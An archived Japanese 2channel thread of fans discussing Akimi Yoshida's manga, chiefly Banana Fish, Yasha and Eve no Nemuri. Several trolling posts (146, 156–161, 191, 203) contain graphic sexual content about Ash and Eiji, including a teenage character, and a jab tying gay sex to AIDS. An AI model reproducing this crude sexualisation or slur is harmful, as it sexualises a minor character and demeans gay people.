142 :花と名無しさん:2006/12/11(月) 10:41:25 ID:???0
漫画の文庫の解説ってホントにいらない。
どうしても最終ページに何かつけたいなら
本人によるあとがきにして欲しい。
文字だけでもいいから。

143 :花と名無しさん:2006/12/11(月) 11:34:33 ID:???O
リアルタイムで読んでたけど、絶対死に落ちだと思てたよ
多分大半の読者が想像してたんでは(何か悲壮な流れだったんで
逆をついて映画の「グロリア」みたいなラストも期待してたんだけどね

144 :花と名無しさん:2006/12/11(月) 20:12:31 ID:???0
>>143
グロリア知らない。どういうラスト?

145 :花と名無しさん:2006/12/11(月) 22:09:16 ID:???O
>>144
ネタバレ注意
http://homepage2.nifty.com/e-tedukuri/GLORIA.htm

146 :花と名無しさん:2006/12/12(火) 01:22:55 ID:t/pHgg130
アリサの得意技は膣痙攣で相手を窒息死よォ〜〜〜〜〜!!!!!

147 :花と名無しさん:2006/12/12(火) 06:45:40 ID:???O
お下劣だわ

148 :花と名無しさん:2006/12/14(木) 00:14:14 ID:???0
なんでそこが痙攣すると相手が窒息するんだ?
わけわからん

149 :花と名無しさん:2006/12/14(木) 00:42:41 ID:???0
>>146はチンコで呼吸してるんだろう。

150 :花と名無しさん:2006/12/14(木) 09:38:56 ID:LmQUTzXF0
最近イブの眠りを読みました。
1巻の最後の関係図にシンの結婚式シーンが載っているのですが、
番外編として書かれてるのでしょうか?
日本人の女の子は光の庭に出てくる子なのかなと思っていたのですが、
実際に話があるのなら読んでみたいです。
教えてチャンですみませんがどなたか教えてくださ〜い。

151 :花と名無しさん:2006/12/14(木) 14:34:16 ID:???O
光の庭の暁(だっけ?)だと 普通に思ってたよ


152 :花と名無しさん:2006/12/14(木) 21:07:38 ID:???0
結婚式のシーンは、なんか企画モノ商品のおまけで、漫画じゃなかったと思った。

153 :花と名無しさん:2006/12/15(金) 21:33:12 ID:???0
画集だか夜叉オフィシャルガイドブックって言ってなかった?
両方とも持ってないけどw

154 :花と名無しさん:2006/12/15(金) 22:06:29 ID:MOYB0ETN0
150です。
皆さん情報ありがとうございました。
今更ながら夜叉、イブの眠りを読みシンに興味津々となってしまいました。
結婚式シーンの現物が見たいものです。

155 :花と名無しさん:2006/12/16(土) 00:54:24 ID:???0
もとはバナナのスペシャルボックス
(名前違うかも、1万くらいする限定品)の
中に入っていた、エイジが撮ったという設定の写真集(という名のミニ画集)
シン×暁の結婚式絵が2枚載ってた。

YASHAガイドでは烈のことを語るページかなんかで
そのうちの1枚が使われてる。
たぶんイブにのってるのと同じだったはず。



156 :花と名無しさん:2006/12/16(土) 18:25:21 ID:???0
やっぱり英二とシンはセックスしてたんだろうな

157 :花と名無しさん:2006/12/16(土) 18:52:36 ID:???0
アッシュって無口っぽいし、も少し明るい性格だったら良かったのに

158 :花と名無しさん:2006/12/16(土) 19:17:05 ID:???0
無口に英二とセックスしてたんだろうなぁ。

159 :花と名無しさん:2006/12/17(日) 14:07:26 ID:N6aa5Rrz0
フィニッシュは中出し。

160 :花と名無しさん:2006/12/17(日) 14:12:15 ID:???O
お下劣だわ

161 :花と名無しさん:2006/12/17(日) 16:20:24 ID:???0
ウンコで汚れたアッシュのチンポを舐めてしゃぶって舐めてしゃぶって
キレイキレイにしてあげる英二。
また硬くなったアッシュのペニスを自らの肛門に導き騎乗位で絶叫する
英二。
アッシュまた中出し。
(※文頭に戻る)

162 :花と名無しさん:2006/12/18(月) 08:27:09 ID:5Dy9zP3f0
見苦しい。スレ違い板違いだ。801板にスレでも立てて、そっちでやれ。自治厨上等。


163 :花と名無しさん:2006/12/18(月) 11:22:26 ID:M+yNmbubO
すぐ下ネタに流れるよな

164 :花と名無しさん:2006/12/18(月) 13:15:47 ID:???0
番外編でシンが、
アッシュと英二の間に恋愛感情はあったかもしれんがプラトニックだった
みたいなこと言ってたじゃないか。うろ覚えだが

165 :花と名無しさん:2006/12/18(月) 13:42:31 ID:???0
まあ、描き終わったあとで、秋生もこれは純粋な友情超えちまってるって
思ったんじゃないの。最後の手紙ほんときもかったから。
もっと男同士の友情だなあ、って思える手紙がよかったよ。

166 :花と名無しさん:2006/12/18(月) 13:56:16 ID:aXZnYwcm0
だからこそ801同人作家がこぞってバナナに飛びついたわけで。

167 :花と名無しさん:2006/12/18(月) 14:04:17 ID:???0
私もアッシュと英二の間にあったのが、純粋な男同士の友情だったとは思えない。
といっても、間違いなくプラトニックだったろうけど。
吉田秋生って、同性愛っぽいのが結構好きなのでは?

168 :花と名無しさん:2006/12/18(月) 14:22:00 ID:???0
友情でもないし、恋愛感情でもないでしょ。
純粋とかそういうの全て超えた絆があったと思う。
敢えて言葉にするなら、家族愛に近いかと。
無理やり同性愛にせんでも…


169 :花と名無しさん:2006/12/18(月) 14:31:28 ID:???0
友情、恋愛感情、家族愛etcすべて含んた愛情だと思った

170 :花と名無しさん:2006/12/18(月) 14:32:36 ID:???0
>>169
そうかも。人間丸ごと愛したって感じ。

171 :花と名無しさん:2006/12/18(月) 14:44:31 ID:???0
ま、恋愛感情もいくらか入ってたかもしれないけど、
基本的には友情、家族愛っぽいものだと思う。

172 :花と名無しさん:2006/12/18(月) 14:57:41 ID:???0
>>168
あんな気持ち悪い距離のとり方をする家族はいませんw

知人のゲイが、アッシュと英二の関係はセックスって要素を取っ払った
ゲイの恋愛そのものだと言ってた。
だからゲイからも凄い支持があったらしいよ

173 :花と名無しさん:2006/12/18(月) 15:14:56 ID:???0
別に恋愛感情あってもかまわなかった。
何がイヤだったかというと、いつまでも2人が友情の名を借りて
精神的にホモってたことが気持ち悪かった。
潔く「お前のことが好きかもしんない」とか認めたほうが気持ち悪さは半減した。

174 :花と名無しさん:2006/12/18(月) 15:40:12 ID:???0
お互い好きってのは認めてたようなもんでしょ。
俺達は友情で結ばれてるぜって主張してた訳でもなし。
無理に恋人だ友達だって決めなくてもいいかと。
言葉にしちゃうと漫画全体が変わってしまう。

175 :花と名無しさん:2006/12/18(月) 16:29:51 ID:???0
英二とアッシュの間柄、恋愛だ友情だと作中で明確に
言葉にしなかったことで支持を得たのかなと思ってたんだが
「そんな簡単に名前がつけられるようなものじゃないんだよフフン」みたいな
見下されてるような感じを受ける人がいるのかも?

176 :花と名無しさん:2006/12/18(月) 19:16:12 ID:???0
>>172
ゲイの恋愛って、ああいうものなんだ…

一度、アッシュが英二に「気持ち悪いな。おまえゲイか?」
みたいな台詞を言ってたような覚えがあるんだけど…記憶ちがいかな。
つまり、アッシュは同性愛をよく思ってなかったような。

177 :花と名無しさん:2006/12/18(月) 19:42:14 ID:???0
そう発言して、英二がゲイに対してどう思ってるか探ってたんだよ。

178 :花と名無しさん:2006/12/18(月) 20:09:47 ID:???0
病的にゲイに過敏な人が紛れてるけど何なの?
読者全部にBFはゲイ漫画と認識させでもすれば気が済むんだろうか…。
どんな人生を送ってるんだか気になるw

179 :花と名無しさん:2006/12/18(月) 20:29:26 ID:???0
ゲイに別に嫌悪感はないけど、BFの2人は好意的に見れない。
アッシュはいいけど、英二に魅力がないから。
この2人の関係は何か納得しづらいものがあるな。

180 :花と名無しさん:2006/12/18(月) 20:33:05 ID:???0
あ、そう。

181 :花と名無しさん:2006/12/19(火) 00:00:45 ID:???0
前スレで、英二を女に変換して読んでたって人がいたけど、
私はアッシュを女に変換して読んでた。

182 :花と名無しさん:2006/12/19(火) 00:24:34 ID:???0
>>179
英二も5,6巻位までは良かったジャン。男気も見せてくれて。
その後だよね。アッシュも英二もホモみたいになよなよしちゃうのは…
>>176
あったね。最初の方。でも悪く思ってる、ってのとは違うような。

183 :花と名無しさん:2006/12/19(火) 00:31:05 ID:???0
英二がお母さん、アッシュが子供って感じがしたな。
つらい目にあってお家に帰ってくると、優しいお母さんが「よしよし」してくれるみたいな。


184 :花と名無しさん:2006/12/19(火) 00:31:40 ID:???0
>>179
英二がデクの坊じゃないとアッシュ秋生リンクスが満足しないから。
必要なのは自分を脅かさない親と、皆に愛される身体。

185 :花と名無しさん:2006/12/19(火) 00:55:30 ID:???0
>>183
そんな“ハードボイルド”やだ

186 :花と名無しさん:2006/12/19(火) 13:26:28 ID:???0
ま、BFはアッシュが目立つための漫画だからね

187 :花と名無しさん:2006/12/19(火) 13:32:36 ID:???0
まあ、英二はデクの坊だったけど、日本の男性ってあんなものじゃないの?

188 :花と名無しさん:2006/12/19(火) 14:00:24 ID:???0
言えてる。昔の田舎の男の子だもんね。
もっとハキハキして自分の意見をちゃんと言って、グジグジ泣いたりしなきゃ
英二のこともっと好きになれたかもしれない。
月龍が英二みてイラつくのよく分かる。アッシュに気に入られてるとかいう理由でなくて。

189 :花と名無しさん:2006/12/19(火) 14:19:41 ID:???0
話をぶった切ってごめんなさい。
月龍って死んじゃったんだってね。バナナ以降は読んでないから知らなかった…
けっこう好きだったなあ。はじめはただの不幸背負った美形キャラかと思ってたら、
どんどん人間くさくなっていって。いやな奴だったけど、そこがいいって言うか。
アッシュ同様、たくさん人殺しちゃったから仕方ないかあ…

190 :花と名無しさん:2006/12/19(火) 16:21:07 ID:???0
アッシュ白人の友達いなかったのかよ

191 :花と名無しさん:2006/12/19(火) 20:49:41 ID:???0
英二と言う名のセフレはいました。アナルガバガバです。もちろん純粋なセフレであって、
恋愛感情なんてまったくありません。バナナは801じゃないですから

192 :花と名無しさん:2006/12/19(火) 23:12:43 ID:???0
月龍死んじゃったね
でも会話だけで、ちゃんとは描かれてなかったよ

193 :花と名無しさん:2006/12/20(水) 00:45:32 ID:???0
どっかで生きてるのかもよ。
顔と名前を変えて。

194 :花と名無しさん:2006/12/20(水) 11:44:56 ID:???0
でも、おじさんになった月龍は見たくないから、若いうちに死んでよかったのかも…。
女の子の顔してたから、年取るとおじさんじゃなくておばさんになっちゃいそう。

195 :花と名無しさん:2006/12/20(水) 17:25:10 ID:???0
同じ美少年でも、アッシュはちゃんと「おじさん」になっただろうね。
美中年…

196 :花と名無しさん:2006/12/20(水) 18:27:48 ID:???0
英二って結婚しなかったんだっけ
好きな女性もできなかったのかな

197 :花と名無しさん:2006/12/20(水) 18:52:35 ID:???0
そういうとこも気持ち悪いんのよ、英二は。
お前も男なら、男らしく生きろ!って思うんだが。


198 :花と名無しさん:2006/12/22(金) 00:09:53 ID:???0
独身だと確定してる描写はなかったはずでは?

199 :花と名無しさん:2006/12/22(金) 08:56:23 ID:???0
「光の庭」の時点までは、おそらく独身だろう。あの話で過去から解き放たれた
訳だから、将来は好きな女性が出来て結婚といった可能性も充分ありでは?

200 :花と名無しさん:2006/12/22(金) 09:18:22 ID:???0
なんで英二は髪を伸ばしたんだろうね(藁)

201 :花と名無しさん:2006/12/22(金) 13:03:57 ID:???0
あーちすとっぽくするため

202 :花と名無しさん:2006/12/23(土) 01:05:38 ID:???0
アジア大会見て思ったが、あのアフロ三女って女子代表の荒川が
モデルだよね。
なんでいきなりアフロかと悩んでたけどすっきりした

203 :花と名無しさん:2006/12/26(火) 23:02:23 ID:???0
>>199
アッシュの呪縛から開放されて
フリーダムなホモセックスに開眼し熱中して真の快楽を会得するのだよ、
英二は。
んでナマ派の英二はエイズになる

204 :花と名無しさん:2006/12/27(水) 08:19:28 ID:???0
>>203
801板へお逝きなさい。


205 :花と名無しさん:2007/01/02(火) 10:38:56 ID:???0
最近バナナフィッシュ読んだけど
途中からアッシュがやたら英二に固執する理由がわからなかった。
英二の何が良いのかもよくわからん。
たまたま世間知らずで純粋な人間がめずらしく、それに癒されただけで
ああいうピュアな人間だったら別に英二じゃなくても
誰でもよかったんだろうなぁという印象。

でもラストの終わり方は綺麗でよかった。

206 :花と名無しさん:2007/01/02(火) 23:44:11 ID:???O
容姿とかも好ましかったんかもよ
向こうの人には日本人男性は中性的に見えるとか
英二はもろにそういう感じで、男性的な生臭さがない
アッシュは根っこに男性恐怖症みたいなものを抱えてたんだと思う

なーんてな

207 :花と名無しさん:2007/01/03(水) 02:02:02 ID:???0
>>206
あー、でもあるかもよ、そういう側面は。
英二はただでさえ若く見える東洋人の中でも童顔なわけで
男性「性」みたいなものからは遠いわけだし。

208 :花と名無しさん:2007/01/03(水) 17:55:52 ID:???0
オフィシャルブックには、
「アッシュは少年期の性的虐待によるトラウマがある」ため、
「成人男性を意識させない英二には気を許せた」、
「英二は無垢な子供時代のアッシュの分身だ」とあるよ。

出先でTV見たくて、ネカフェに行ったのに、結局BFを読んじまった。
話が片付かなくてもいいから、18巻で終わってくれればとつくづく思った。チラウラスマソ

209 :花と名無しさん:2007/01/05(金) 09:14:40 ID:???0
文庫版で読んだんだけど、コミックは18巻までならどこで終わるの?

210 :花と名無しさん:2007/01/05(金) 18:22:48 ID:???0
見た目から男性性まる出しでムサッ苦しく男臭く、アッシュよりずっと年上で、
まったくのノンケで女好きで、アッシュのフェロモン全開の姿を見ようがたとえ迫られようが無反応で、
だけどアッシュを本当の弟や息子のように愛していて、
感極まって抱きしめようが I love you と怒鳴ろうがアッシュ自身が固まらないぐらいに朴訥無骨。

ってキャラの方がアッシュのいろんな意味のトラウマを癒せただろうなーと思う自分。
マックスや、名前が思い出せないけどあの背の低いハゲ刑事なんかはすごくいいキャラで、
アッシュを癒せるポジションにあった。
あれを活用しないなんて吉田さんももったいないことを。

英二は英二でいいんだけど、無垢な子供時代のアッシュというよりはクラリスみたいだったよ英二。

211 :花と名無しさん:2007/01/06(土) 02:55:37 ID:???O
クラリスってシュライバー博士?

212 :花と名無しさん:2007/01/06(土) 03:56:54 ID:???0
>>211
そうだよ

213 :花と名無しさん:2007/01/08(月) 18:11:53 ID:???0
>>209
セントラルパークで、支払いして、別れたところでつ。

214 :花と名無しさん:2007/01/08(月) 22:00:47 ID:???0
何か新作は今のところ無いんでしょうか?

215 :花と名無しさん:2007/01/08(月) 22:26:14 ID:???0
フラワーズで不定期連載?やってるけど

216 :花と名無しさん:2007/01/09(火) 03:19:41 ID:???0
アッシュが死ななかったら「まぁそれなりに面白かった」で終わってたけど
死なれたことで印象深くはなった。良い悪いは別として。

217 :花と名無しさん:2007/01/09(火) 12:26:03 ID:???0
>>215
ありがとうございます
定期購読していないので、すっかり見そびれてます……>>214

218 :花と名無しさん:2007/01/10(水) 02:02:56 ID:???O
アッシュ=リヴァー・フェニックス
オーサーも誰かに似てると思うんだけど、モデル誰なんだろ!?

219 :花と名無しさん:2007/01/10(水) 08:44:22 ID:???0
>>218
オーサーのモデルは、確かスティングだったかと。元ポリスの。


220 :花と名無しさん:2007/01/10(水) 22:25:46 ID:???O
秋生はミーハーなんだね

221 :花と名無しさん:2007/01/10(水) 23:23:55 ID:KU7MK1Zv0
竹宮恵子の「風と木の詩」がガンダムの安彦良和監督でアニメ化されたとき
吉田の漫画もアニメ化され同時上映されたはず
ジューシーフルーツの十中八九NGという歌の英語版が主題歌だった。
普通の映画館じゃなくて、県民会館みたいな場所を借りて上映してたはず
タイトル分かる人いる?

222 :花と名無しさん:2007/01/11(木) 08:52:01 ID:???0
>>221
「悪魔と姫ぎみ」じゃね(アニメは見てないけど)?
小ネタ満載の、おバカで笑える短編。

223 :花と名無しさん:2007/01/11(木) 14:24:21 ID:qLiSYcbx0
>>222
サンクス!
竹宮のほうは『風と木〜』じゃなくて「夏への扉」だね。
近田春男プロデュースらしいから
ジューシーフルーツというのは間違いないようだ。
http://search.yahoo.co.jp/search?fr=slv1-mdp&p=%b0%ad%cb%e2%a4%c8%c9%b1%a4%ae%a4%df


224 :花と名無しさん:2007/01/11(木) 14:27:22 ID:qLiSYcbx0
プロデューサーじゃなくて音楽担当だったか
すまん
木の葉のこが声だって
懐かしいwwwwwwwwwwww

225 :花と名無しさん:2007/01/11(木) 14:30:16 ID:qLiSYcbx0
http://anison.info/data/song/3689Y.html

226 :花と名無しさん:2007/01/11(木) 14:30:30 ID:???0
>>221
それ見た。友人が試写会の券もらったので。
「夏への扉」はこっぱずかしかったが「悪魔と姫ぎみ」はそれなりに
面白かった気が。
でもなんでこれをアニメ化するのかわからんと思った。
原作は好きだったけど。

227 :花と名無しさん:2007/01/11(木) 14:31:04 ID:qLiSYcbx0
主題歌じゃなくて挿入歌だった

228 :花と名無しさん:2007/01/11(木) 14:35:46 ID:???0
おう、観た人もいるのか。>>226
たしかアニメ雑誌かなんかで見て、たいして興味もなかったけど
ラジオでそれの特集やってて、十中八九NGの英語版が流れたんでビックリした
おぼえがある。


229 :花と名無しさん:2007/01/11(木) 14:41:42 ID:+baEoLWu0
「悪魔と姫ぎみ」観たくて「夏への扉」も我慢して観た私ですが、「夏へ」の音楽が
当時好きだった羽田健太郎さんだったのでよかった。
「悪魔と」のほう、かなり原作を再現(絵的に)しているなあと感心した。
少女マンガのアニメ化といったら絵がヘンになるのがあたりまえの時代だったし。
関係ないですが大友の「アキラ」がアニメになったとき、見ていて
「これ大友さんの絵より吉田秋生さんの絵に近いんじゃ?」と思えてしかたがなかった。


230 :花と名無しさん:2007/01/11(木) 14:46:16 ID:???0
羽田健太郎って「コブラ」の音楽の人か?

吉田は大友に画風が似てると言われて
あんな巧い人に似てるといわれて嬉しいと言ってたな
渋谷陽一のラジオに出たとき

231 :花と名無しさん:2007/01/11(木) 22:04:35 ID:???0
「トリトン」もやってる。

Nステでピアノも弾いてたね。

232 :花と名無しさん:2007/01/12(金) 02:18:08 ID:???O
>>210
ムッシューゴルツィネのことかと思って読んでた

233 :花と名無しさん:2007/01/12(金) 08:37:41 ID:???0
>>232
ゴルツィネはなあ…アッシュの才能を伸ばしてやるのは良いとしても、やり方
と方向性がちょっと(あと性的嗜好)。一歩退いて、それこそ足長おじさん的
援助でもしてやってれば感謝されてたかも知れんが。


234 :花と名無しさん:2007/01/12(金) 10:36:56 ID:???O
ウホッショタ趣味がなければ、むしろ二人は気が合っていたかも。
・天才肌の一匹狼
・わりと感情的
・プライド高い

ゴルツィネとアッシュが手を組めばいいのにぃ。

235 :花と名無しさん:2007/01/14(日) 12:25:24 ID:???0
自分の中じゃアッシュは死んでないということで脳内補完されてます。
今思い出してもあの微笑んだ顔はせつな過ぎるので。

>>205
人間が人間を愛するなんてそんなもんだろ?
好きになる理由なんてそんなもの必要だと感じたこと無かったよ。
でもあえていうなら英二には好かれる理由はたくさんあったと思う。
母性や差し引き無しでの優しさ、思いやり、無垢で無知、守らなきゃならない使命感。

236 :花と名無しさん:2007/01/14(日) 12:41:59 ID:???0
個人的にはアッシュが死んで終わりでよかったと思う。
アッシュはそういうキャラってことで。

237 :花と名無しさん:2007/01/14(日) 13:06:53 ID:???0
英二ってごく普通の日本の男の子って感じ
ああいう子がアッシュの周りにはいなかったんだろうね

238 :花と名無しさん:2007/01/14(日) 14:06:44 ID:???0
アッシュは死ななきゃダメでしょ

239 :花と名無しさん:2007/01/14(日) 15:35:34 ID:???0
最初からアッシュは死ぬもんだと思っていたし
途中からgdgdになった展開とか最後の手紙の陳腐さとか
萎えポイントもいっぱいあったんだけど
アッシュが図書館で空を見上げたシーンはやっぱり泣きそうになった
どんな気持ちだったのかなあとか色々勝手に感情移入した自分キモスwwww

ていうか吉田の漫画全般にいえることだけど
馴染みのキャラを最後に殺すのなしにしてほしいよ
こんなもん悲しいに決まってるわ
ほんと今さらなんだけどさw

240 :花と名無しさん:2007/01/14(日) 17:43:36 ID:???0
うん…まあ、殺したほうが感動的になるものね

241 :花と名無しさん:2007/01/14(日) 22:28:23 ID:???0
そうなんだよ、主人公が死ぬのが悲しくて、バナナ以降去年まで、吉田マンガから遠ざかってたよ。
だから、yashaは、最後主人公が死ななくて、よかったよ。
イブは見なかったことにしてw

242 :花と名無しさん:2007/01/14(日) 23:06:37 ID:???0
夜叉は主人公は死ななかったけど、凛はこりゃ絶対死ぬなー
凛だけ死ぬか二人とも死ぬかどっちかだろうなーと思ってた

バナナフィッシュは途中からダラダラしてきて萎えかけてたけど
アッシュ死んだおかげで綺麗にまとまって良かったと思う

243 :花と名無しさん:2007/01/15(月) 01:21:19 ID:???0
でもやっぱり死んでほしくなかった

244 :花と名無しさん:2007/01/15(月) 12:38:08 ID:???0
>>242
同意。アッシュが死ななかったら収まりが悪すぎると思う

245 :花と名無しさん:2007/01/15(月) 14:35:03 ID:???0
アッシュかっこいい
こういう人と結婚したい
英二かアッシュかどっちかが女だったら二人は結婚してるな

246 :花と名無しさん:2007/01/15(月) 16:01:47 ID:???0
アッシュってさ、不良少年どものボスだったんだよね。
昼まで寝て起きたらプールバーで遊ぶ。スキップが来たら機嫌もよい。
そんな感じだったよね・・・。
お酒はたまに飲んでたのは見たけど、タバコって吸ってたっけ?
タバコ吸ってたシーンないよね?なのに突然火のついたタバコ持ってウロウロしてる
扉絵もあったよね。

247 :花と名無しさん:2007/01/15(月) 22:53:25 ID:???0
アッシュ死ななかったらバナナは
ちょっと801風味の漫画、で終わりな気がする。
途中の戦闘や頭脳戦は全然思い出せないけど
あの最後の衝撃と静かに死んでいく俯瞰の絵だけはとても印象深い。
終わりよければすべて良し、はこの漫画のためにあるような言葉だなぁ

248 :花と名無しさん:2007/01/16(火) 00:15:38 ID:???0
アッシュはスモーカーだったのか、教えてください!

249 :花と名無しさん:2007/01/16(火) 02:07:35 ID:???0
漫画読めば?漫喫に行けばあるだろ。

250 :花と名無しさん:2007/01/16(火) 10:38:16 ID:???0
吸ってなかったと思う。吸ってたとしても1,2回じゃない?

251 :花と名無しさん:2007/01/16(火) 13:49:36 ID:???0
自衛のためとはいえ、あれだけ人を殺しておいて幸せになるのは
許されないだろう。おてんとうさまがゆるさん。
たとえばアッシュが生き延びて日本へ来て学生をやるとか
モデルをやるとか妄想するのは楽しいかもしれんがそうなったら
もはや二次創作の同人誌。

252 :花と名無しさん:2007/01/16(火) 14:15:33 ID:???0
ん〜〜自分の考えでは・・初めて読んだときは
アッシュは人殺しの自分を恥じて、また後悔し苦しんでたから
死にオチでハッピーエンドだなと思ってたが、最近は考えかわった。
日本なんかに来なくていい。最後シンの兄貴に刺されるまでは町のダニに戻るって
言ってたんだし、もともとロクデナシのチンピラなんだから
殺しても責められても責められても、図太くずうずうしくもあつかましく
生きていけばいいじゃん。憎まれるの慣れてんでしょ、アッシュは。

253 :花と名無しさん:2007/01/16(火) 23:58:11 ID:???0
死ぬんだろうな、と思ってたからこそ、それをいい意味で裏切るラストが欲しかったOTL
主人公殺しのヨシダだと思っていたので、夜叉は主人公を殺さなかったところがショーゲキだたw
最終的には(ry

254 :花と名無しさん:2007/01/17(水) 00:51:34 ID:???0
主人公殺しって、「カリフォルニア」もヒースは死なないし
「吉祥天女」も小夜子は死なないし、なんでそう思ったの?

255 :花と名無しさん:2007/01/17(水) 06:53:40 ID:???0
YASHAは正直ケンが途中でおいしい死に方すると思ってた。
イブまで終わった時うふふあははーと笑って余生過ごせるキャラだとは。

256 :花と名無しさん:2007/01/17(水) 17:56:55 ID:???O
そういえば、アッシュは天才的なハッカー(プログラマ)だったが
どこで技能を身につけたんだろうな

257 :花と名無しさん:2007/01/17(水) 18:26:19 ID:???0
アッシュって本当に、
中学生ぐらいの女の子が好きそうな設定をあれこれ詰め込みました、
ってキャラだね、今にして思うと。

258 :花と名無しさん:2007/01/17(水) 22:31:06 ID:???0
>>254
253じゃないけど、「主人公」じゃなくて「主人公の大切な人」を殺すのが
好きな作家だなあと前から思ってた。

カリフォルニア物語のイーヴ
ジュリエットの海の透
吉祥天女の涼(だっけ?)
バナナフィッシュのアッシュ
タイトル忘れたけど、擬人化した虫の話の、オオミズアヲ

259 :花と名無しさん:2007/01/18(木) 09:13:26 ID:???0
>>256
ゴルツィネの教育カリキュラムに、コンピューターの事も入ってたんだろう。
で、アッシュは優秀過ぎたので、自力でハッキング技術なんかもマスターしたと。


260 :亡命者の告発:2007/01/18(木) 15:21:13 ID:???O
大切な人が殺された場合
復讐の動機は更新されるし、読者も復讐は妥当と見なす
とは、アメリカナイズされた思考ですがね
実際、少女漫画でこれほどアメリカンな作者はいないのではないかな
これだけ名作名高いbananaを読んだ読者は
根底には、アメリカの戦後教育のたまもので
日本は属国かぁと、エイジを見て思う

261 :花と名無しさん:2007/01/18(木) 23:23:24 ID:???0
エイジも最初は「大和魂みせてやるぜぇ!」ってトコがあったんだがな。
棒高跳びネタもっとやってほしかった。

262 :花と名無しさん:2007/01/19(金) 08:17:05 ID:???O
取ってつけたようなエピソードだったよ
棒高跳び

263 :花と名無しさん:2007/01/19(金) 08:34:14 ID:???0
まあ前作(「Fly boy,in the sky」)からの続きと言う事でファンサービス
みたいな物でしょ、あれは(棒高跳び)。一回やりゃ御腹一杯。


264 :花と名無しさん:2007/01/19(金) 08:41:29 ID:???0
連レスで何だが、>>259のカキコの根拠は、単行本七巻の150から151ページの
「みごとな仕事だった…」「あんたの投資のおかげといえなくもない」前後ね。


265 :花と名無しさん:2007/01/19(金) 18:40:10 ID:???0
アッシュは刺されたり撃たれたりいっぱいしてたじゃん
裸は傷あとだらけなんだよね、きっと。
体に傷がある人とセックスするのって何か怖いというか、落ち着かないよね。
リラックスできない。

266 :花と名無しさん:2007/01/19(金) 21:59:53 ID:???0
↑経験あるんですか?

267 :花と名無しさん:2007/01/19(金) 23:00:53 ID:/3fC2DcrO
↑って聞きたくなるよね やっぱり

268 :花と名無しさん:2007/01/20(土) 01:05:56 ID:SvOPofWQ0
いまから15年ぐらいまえのまんがのことを
語れる人がいるって2ちゃんっていいなぁ・・。


269 :花と名無しさん:2007/01/20(土) 01:37:37 ID:???0
文庫も出てるし新参も多いんじゃない?

270 :花と名無しさん:2007/01/21(日) 12:06:30 ID:???0
自称やくざと付き合ったことがある。
体中、ひきつったようなんやら細かいのやら沢山傷跡あってひいた。

271 :花と名無しさん:2007/01/21(日) 13:28:38 ID:???0
彫り物もあった?

272 :花と名無しさん:2007/01/21(日) 15:49:47 ID:???0
ううん なかった
とにかく、アッシュって体にも顔にも消えない傷は絶対ある
そんな体で高級男娼なんて・・・・

273 :花と名無しさん:2007/01/21(日) 19:24:07 ID:???0
高級男娼ってアッシュが子供の頃だよね。
当時はなかったんじゃないの?>傷

関係ないけど、そういう傷に興奮したり愛しさを感じる人もいるよな。

274 :花と名無しさん:2007/01/21(日) 22:02:50 ID:???0
アッシュは生き方自体にコンプレックス持ってるんだから、
傷にも当然持ってるはずだしょ。なのにホイホイ脱いでたのが不思議。


275 :花と名無しさん:2007/01/21(日) 22:07:02 ID:???0
異常な性環境に子供の頃から置かれてた子はまともな環境に戻っても
自暴自棄になりやすいらしい。

276 :花と名無しさん:2007/01/21(日) 22:20:39 ID:???0
>>274
そこで勿体つけて隠す方こそを嫌がりそうな気もする

277 :花と名無しさん:2007/01/21(日) 22:48:50 ID:???0
>>274
死にたくないから脱いだ、それだけのことでしょ。

278 :花と名無しさん:2007/01/22(月) 11:43:37 ID:???0
>277
売春で脱いだのという意味じゃなくって、英二や仲間と暮らしてる時とか
伊部さんの前でも着替えてなかったっけ?
一人でこっそり着替える方が何かコンプレックスの度合いとつりあいがとれてる。

279 :花と名無しさん:2007/01/22(月) 18:25:06 ID:???0
まあ何でも完璧スーパーマン設定ですし

280 :花と名無しさん:2007/01/22(月) 21:35:11 ID:???0
そう、ベタ設定でも秋生の創造したキャラの中で一番カッコいい

281 :花と名無しさん:2007/01/22(月) 21:52:18 ID:???0
シンよりアッシュ亡き後の手下どもがどうなったかが気になる。
完全スルーされると余計に。

282 :花と名無しさん:2007/01/23(火) 08:48:02 ID:???0
まーでも、アレックスあたりを新リーダーにして、結構しぶとくやってるんでない?
チャイナタウンやハーレムの連中とも、対ゴルツィネ戦で新しい絆が出来たのも好条件だし。


283 :花と名無しさん:2007/01/23(火) 22:21:17 ID:???0
以前から気になってたんだけど、「光の庭」でシンと暁が歌ってた
「おハシの国のォ ヒトだものォ〜」って何かの歌詞? 
それとも単なる二人の鼻歌なのかな。

既出だったらスマンが、長いこと気になって…orz

284 :花と名無しさん:2007/01/23(火) 22:29:59 ID:???0
>>283
何か食べ物のCMに使われてた。CMソングだと思う。

285 :花と名無しさん:2007/01/23(火) 23:11:31 ID:???0
ググってみた。味の素のCMみたい「お箸の国の人だもの」。
三田佳子ですってよ奥様(謎)。


286 :283:2007/01/24(水) 01:05:14 ID:???0
>>284 >>285
トンクス!! 長年の疑問がとけた…本当にありがとう。

CMだったのか。
あのシーンでシン&暁の気が合う様子が垣間見えたので、すごく好きだったんだよなー
しかしなぜシンが歌えたんだろう(笑)
ほんとに日本語勉強したんだな。

そしてYou tubeでメロディ聞けないかと探してみたが、さすがになかったよorz

287 :花と名無しさん:2007/01/24(水) 11:12:59 ID:???0
昔CMでよくやってたよ。
ああいう時事ネタっぽいのは時代が古くなるとわからん人が出てくるから
いかんね。

288 :花と名無しさん:2007/01/24(水) 17:46:03 ID:???0
まあ、所詮は小ネタだしね。無問題でしょ。


289 :花と名無しさん:2007/01/24(水) 20:34:31 ID:???0
暁の奥様ver.を見てみたい。バナナはもちろん、夜叉にもイヴにも出てきてないよな?

290 :花と名無しさん:2007/01/24(水) 22:26:56 ID:???0
922 名無しかわいいよ名無し sage 2007/01/24(水) 22:24:37 ID:ash8voly

アッシュ出たウレシスw

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)